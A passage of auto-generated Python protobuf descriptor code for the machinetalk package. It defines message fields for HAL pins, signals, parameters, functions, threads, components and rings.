is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\274\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=163,
)
_SERVICEANNOUNCEMENT = _descriptor.Descriptor(
name='ServiceAnnouncement',
full_name='machinetalk.ServiceAnnouncement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='stype', full_name='machinetalk.ServiceAnnouncement.stype', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='version', full_name='machinetalk.ServiceAnnouncement.version', index=1,
number=2, type=7, cpp_type=3, label=2,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='instance', full_name='machinetalk.ServiceAnnouncement.instance', index=2,
number=3, type=7, cpp_type=3, label=2,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='api', full_name='machinetalk.ServiceAnnouncement.api', index=3,
number=8, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='uri', full_name='machinetalk.ServiceAnnouncement.uri', index=4,
number=6, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='machinetalk.ServiceAnnouncement.description', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\275\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=166,
serialized_end=349,
)
_ORIGINATOR = _descriptor.Descriptor(
name='Originator',
full_name='machinetalk.Originator',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='origin', full_name='machinetalk.Originator.origin', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='detail', full_name='machinetalk.Originator.detail', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Originator.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='id', full_name='machinetalk.Originator.id', index=3,
number=4, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='instance', full_name='machinetalk.Originator.instance', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\276\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=352,
serialized_end=523,
)
_ANERROR = _descriptor.Descriptor(
name='AnError',
full_name='machinetalk.AnError',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='error_code', full_name='machinetalk.AnError.error_code', index=0,
number=1, type=15, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='severity', full_name='machinetalk.AnError.severity', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='error_text', full_name='machinetalk.AnError.error_text', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='origin', full_name='machinetalk.AnError.origin', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\277\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=526,
serialized_end=665,
)
_PIN = _descriptor.Descriptor(
name='Pin',
full_name='machinetalk.Pin',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Pin.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Pin.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Pin.handle', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dir', full_name='machinetalk.Pin.dir', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=16,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halbit', full_name='machinetalk.Pin.halbit', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halfloat', full_name='machinetalk.Pin.halfloat', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hals32', full_name='machinetalk.Pin.hals32', index=6,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halu32', full_name='machinetalk.Pin.halu32', index=7,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner', full_name='machinetalk.Pin.owner', index=8,
number=9, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='linked', full_name='machinetalk.Pin.linked', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='oldname', full_name='machinetalk.Pin.oldname', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='epsilon', full_name='machinetalk.Pin.epsilon', index=11,
number=12, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='flags', full_name='machinetalk.Pin.flags', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\300\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=668,
serialized_end=938,
)
_SIGNAL = _descriptor.Descriptor(
name='Signal',
full_name='machinetalk.Signal',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Signal.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Signal.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Signal.handle', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halbit', full_name='machinetalk.Signal.halbit', index=3,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halfloat', full_name='machinetalk.Signal.halfloat', index=4,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hals32', full_name='machinetalk.Signal.hals32', index=5,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halu32', full_name='machinetalk.Signal.halu32', index=6,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='strval', full_name='machinetalk.Signal.strval', index=7,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='blob', full_name='machinetalk.Signal.blob', index=8,
number=10, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='readers', full_name='machinetalk.Signal.readers', index=9,
number=11, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='writers', full_name='machinetalk.Signal.writers', index=10,
number=12, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='bidirs', full_name='machinetalk.Signal.bidirs', index=11,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\301\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=941,
serialized_end=1171,
)
_PARAM = _descriptor.Descriptor(
name='Param',
full_name='machinetalk.Param',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Param.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Param.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Param.handle', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halbit', full_name='machinetalk.Param.halbit', index=3,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halfloat', full_name='machinetalk.Param.halfloat', index=4,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hals32', full_name='machinetalk.Param.hals32', index=5,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halu32', full_name='machinetalk.Param.halu32', index=6,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='strval', full_name='machinetalk.Param.strval', index=7,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='blob', full_name='machinetalk.Param.blob', index=8,
number=10, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dir', full_name='machinetalk.Param.dir', index=9,
number=11, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=64,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='oldname', full_name='machinetalk.Param.oldname', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner', full_name='machinetalk.Param.owner', index=11,
number=13, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='runtime', full_name='machinetalk.Param.runtime', index=12,
number=14, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maytime', full_name='machinetalk.Param.maytime', index=13,
number=15, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\302\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1174,
serialized_end=1464,
)
_FUNCTION = _descriptor.Descriptor(
name='Function',
full_name='machinetalk.Function',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Function.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Function.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner_id', full_name='machinetalk.Function.owner_id', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='users', full_name='machinetalk.Function.users', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='runtime', full_name='machinetalk.Function.runtime', index=4,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxtime', full_name='machinetalk.Function.maxtime', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reentrant', full_name='machinetalk.Function.reentrant', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Function.type', index=7,
number=8, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxtime_increased', full_name='machinetalk.Function.maxtime_increased', index=8,
number=9, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\303\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1467,
serialized_end=1669,
)
_THREAD = _descriptor.Descriptor(
name='Thread',
full_name='machinetalk.Thread',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Thread.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Thread.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='uses_fp', full_name='machinetalk.Thread.uses_fp', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='period', full_name='machinetalk.Thread.period', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='priority', full_name='machinetalk.Thread.priority', index=4,
number=5, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='task_id', full_name='machinetalk.Thread.task_id', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cpu_id', full_name='machinetalk.Thread.cpu_id', index=6,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='function', full_name='machinetalk.Thread.function', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\304\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1672,
serialized_end=1820,
)
_COMPONENT = _descriptor.Descriptor(
name='Component',
full_name='machinetalk.Component',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Component.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ninst', full_name='machinetalk.Component.ninst', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='comp_id', full_name='machinetalk.Component.comp_id', index=2,
number=4, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Component.type', index=3,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='state', full_name='machinetalk.Component.state', index=4,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='last_update', full_name='machinetalk.Component.last_update', index=5,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='last_bound', full_name='machinetalk.Component.last_bound', index=6,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='last_unbound', full_name='machinetalk.Component.last_unbound', index=7,
number=9, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pid', full_name='machinetalk.Component.pid', index=8,
number=10, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='args', full_name='machinetalk.Component.args', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timer', full_name='machinetalk.Component.timer', index=10,
number=12, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg1', full_name='machinetalk.Component.userarg1', index=11,
number=14, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg2', full_name='machinetalk.Component.userarg2', index=12,
number=15, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pin', full_name='machinetalk.Component.pin', index=13,
number=16, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='param', full_name='machinetalk.Component.param', index=14,
number=17, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='funct', full_name='machinetalk.Component.funct', index=15,
number=19, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='no_create', full_name='machinetalk.Component.no_create', index=16,
number=18, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\305\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1823,
serialized_end=2181,
)
_RING = _descriptor.Descriptor(
name='Ring',
full_name='machinetalk.Ring',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Ring.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Ring.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner', full_name='machinetalk.Ring.owner', index=2,
number=3, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='stream', full_name='machinetalk.Ring.stream', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='wmutex', full_name='machinetalk.Ring.wmutex', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rmutex', full_name='machinetalk.Ring.rmutex', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rtapi_shm', full_name='machinetalk.Ring.rtapi_shm', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reader', full_name='machinetalk.Ring.reader', index=7,
number=8, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='writer', full_name='machinetalk.Ring.writer', index=8,
number=9, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='total_size', full_name='machinetalk.Ring.total_size', index=9,
number=10, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='scratchpad', full_name='machinetalk.Ring.scratchpad', index=10,
number=11, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ring_shmkey', full_name='machinetalk.Ring.ring_shmkey', index=11,
number=12, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='encodings', full_name='machinetalk.Ring.encodings', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\306\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2184,
serialized_end=2422,
)
_MEMBER = _descriptor.Descriptor(
name='Member',
full_name='machinetalk.Member',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mtype', full_name='machinetalk.Member.mtype', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
